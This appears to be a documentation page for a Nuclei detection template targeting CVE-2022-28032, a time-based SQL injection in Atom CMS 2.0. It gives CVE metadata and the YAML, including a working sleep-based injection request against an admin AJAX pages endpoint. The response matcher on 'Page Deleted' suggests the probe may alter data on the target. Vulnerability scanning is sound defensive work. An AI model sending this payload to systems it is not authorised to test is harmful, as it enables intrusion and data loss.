Atom CMS v2.0 - SQL Injection
ID: CVE-2022-28032
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve,cve2022,sqli,atom,cms,thedigitalcraft
Description
Section titled “Description”AtomCMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_ajax_pages.php
YAML Source
Section titled “YAML Source”id: CVE-2022-28032
info: name: Atom CMS v2.0 - SQL Injection author: theamanrawat severity: critical description: | AtomCMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_ajax_pages.php impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version Atom CMS v2.1 reference: - https://github.com/thedigicraft/Atom.CMS/issues/263 - https://nvd.nist.gov/vuln/detail/CVE-2022-28032 - https://github.com/ARPSyndicate/cvemon - https://github.com/bornrootcom/fictional-memory classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-28032 cwe-id: CWE-89 epss-score: 0.0161 epss-percentile: 0.87425 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: thedigitalcraft product: atomcms tags: time-based-sqli,cve,cve2022,sqli,atom,cms,thedigitalcraft
http: - raw: - | @timeout: 20s GET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains(body, "Page Deleted")' condition: and# digest: 4a0a00473045022100b96a20245c23682d8a20aed1d90991e3ace10626c8d89a2e920e7761ea42fd72022056f620e19621dd759a304e1e6295e2e1f0892f35f837c255e617f5f7d0e49cdb:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-28032.yaml"